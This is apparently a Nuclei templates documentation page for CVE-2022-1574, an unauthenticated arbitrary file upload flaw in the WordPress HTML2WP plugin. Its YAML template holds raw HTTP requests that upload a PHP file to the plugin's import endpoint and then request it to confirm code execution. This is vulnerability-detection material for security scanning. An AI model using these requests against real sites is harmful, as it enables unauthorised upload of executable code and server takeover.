Skip to content
Nuclei Templates

WordPress HTML2WP <=1.0.0 - Arbitrary File Upload

ID: CVE-2022-1574

Severity: critical

Author: theamanrawat

Tags: cve,cve2022,wp-plugin,wp,fileupload,unauth,wpscan,wordpress,intrusive,html2wp,html2wp_project

Description

Section titled “Description”

WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.

YAML Source

Section titled “YAML Source”
id: CVE-2022-1574


info:
  name: WordPress HTML2WP <=1.0.0 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.
  impact: |
    An attacker can upload malicious files to the server, leading to remote code execution or unauthorized access.
  remediation: |
    Update to the latest version of the plugin or remove it if not needed.
  reference:
    - https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14
    - https://wordpress.org/plugins/html2wp/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1574
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1574
    cwe-id: CWE-352
    epss-score: 0.05961
    epss-percentile: 0.93455
    cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: html2wp_project
    product: html2wp
    framework: wordpress
  tags: cve,cve2022,wp-plugin,wp,fileupload,unauth,wpscan,wordpress,intrusive,html2wp,html2wp_project


http:
  - raw:
      - |
        POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 253
        Content-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990
        Connection: close


        -----------------------------7816508136577551742878603990
        Content-Disposition: form-data; name="local_importing[]"; filename="{{randstr}}.php"
        Content-Type: text/html


        <?php


        echo "File Upload success";


        -----------------------------7816508136577551742878603990--
      - |
        GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 302"
          - "status_code_2 == 200"
          - "contains(body_2, 'File Upload success')"
        condition: and
# digest: 4b0a00483046022100d8e50593f5e87861875794546a9b417328ac9385f97c734c58827d7360e0ff65022100fc07d8c7b8f4025a5c2d6d12c5f952fa5a6ba3a1d77ed28c65423874abe14ab0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1574.yaml"

View on Github